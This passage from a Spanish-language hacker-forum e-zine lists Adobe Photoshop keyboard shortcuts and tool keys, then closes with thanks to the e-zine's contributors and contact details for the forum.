Combinar capas visibles --> Ctrl+Shift+N

Configurar pagina --> Ctrl + Shift + P

Transformación libre --> Ctrl+T

Transformación libre --> Ctrl+TCtrl+Alt+T

Nueva capa --> Ctrl+Shift+N

Nueva capa (sin dialogo) --> Alt+Ctrl+Shift+N

Menus --> Ctrl+Alt+Shift+M

Acercar --> Ctrl++

Alejar --> Ctrl+-

Niveles --> Ctrl + N

Deshacer/rehacer --> Ctrl+Z

Ultimo filtro --> Ctrl + F

Ver extras --> Ctrl + H

Modo de pantalla --> F

Ver reglas --> Ctrl + R

F1 Help

Alt+A Menu Archivo

Alt+E Menu Edicion

Alt+U Ayuda

Alt+V Menu Ventanas

Editar en imageready Shift+ Ctrl+M

Herramienta Selección A

Herramienta Notas N

Herramienta Sector K

Herramienta Mano H

Herramienta degradado G

Herramienta pluma P

Herramienta Borrar E

Herramienta Recortar C

Herramienta Lazo L

Herramienta Texto (Vertical / Horizontal) T

Herramienta Forma U

Herramienta Mover V

Herramienta Varita mágica W

Herramienta Marco M

Herramienta Clonar S

Herramienta pincel B

Herramienta pincel de historia Y

Herramienta pincel corrector J

Colores por defecto (B/N) D

Notación sonora Shift+N

Modo mascara rápida Q

Alt+I Menu Imagen

Alt+P Menu Capas

Alt+S Menu Seleccion

Alt+F Menu Filtro

Alt+T Menu Ver

Page 58: CUH e-zine1ra Edicion

Desde aquí agradecemos a todos los colaboradores que han hecho esto posible , los organizadores de la e-zine somos, gallloo y alesteir que nos enorgullecemos de la e-zine que hemos creado entre todos. Aquí listo a todos los colaboradores y amigos que han participado:

.::Cr4m::. ManCuerTex (ViPeR) ElPerro froseck Don nadie furious dami XD JUCA Logan_doax elektro |_ocutus LTSmash

Gracias a todos por parte de todo el foro

Si tienen alguna sugerencia o quiere contactar con nosotros, puede buscarnos en: http://foro.el-hacker.com

O mandarnos un e-mail a cualquiera de estas dos direcciones de correo: [email protected] [email protected]

Mucha suerte a todos y hasta la próxima edición de la CUH e-zine